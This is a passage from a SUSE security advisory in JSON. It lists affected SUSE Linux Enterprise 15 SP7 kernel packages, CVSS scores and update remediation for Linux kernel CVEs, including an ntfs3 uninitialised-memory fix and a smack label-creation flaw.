"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68727"
},
{
"cve": "CVE-2025-68728",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68728"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nntfs3: fix uninit memory after failed mi_read in mi_format_new\n\nFix a KMSAN un-init bug found by syzkaller.\n\nntfs_get_bh() expects a buffer from sb_getblk(), that buffer may not be\nuptodate. We do not bring the buffer uptodate before setting it as\nuptodate. If the buffer were to not be uptodate, it could mean adding a\nbuffer with un-init data to the mi record. Attempting to load that record\nwill trigger KMSAN.\n\nAvoid this by setting the buffer as uptodate, if it\u0027s not already, by\noverwriting it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68728",
"url": "https://www.suse.com/security/cve/CVE-2025-68728"
},
{
"category": "external",
"summary": "SUSE Bug 1255539 for CVE-2025-68728",
"url": "https://bugzilla.suse.com/1255539"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68728"
},
{
"cve": "CVE-2025-68733",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68733"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmack: fix bug: unprivileged task can create labels\n\nIf an unprivileged task is allowed to relabel itself\n(/smack/relabel-self is not empty),\nit can freely create new labels by writing their\nnames into own /proc/PID/attr/smack/current\n\nThis occurs because do_setattr() imports\nthe provided label in advance,\nbefore checking \"relabel-self\" list.\n\nThis change ensures that the \"relabel-self\" list\nis checked before importing the label.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
